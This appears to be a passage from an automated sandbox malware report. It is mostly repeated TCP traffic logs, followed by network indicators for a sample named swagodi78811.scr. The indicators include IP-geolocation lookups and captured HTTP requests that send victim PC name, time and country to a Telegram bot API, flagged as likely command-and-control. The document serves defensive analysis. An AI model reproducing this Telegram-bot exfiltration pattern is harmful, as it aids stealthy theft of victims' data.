                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
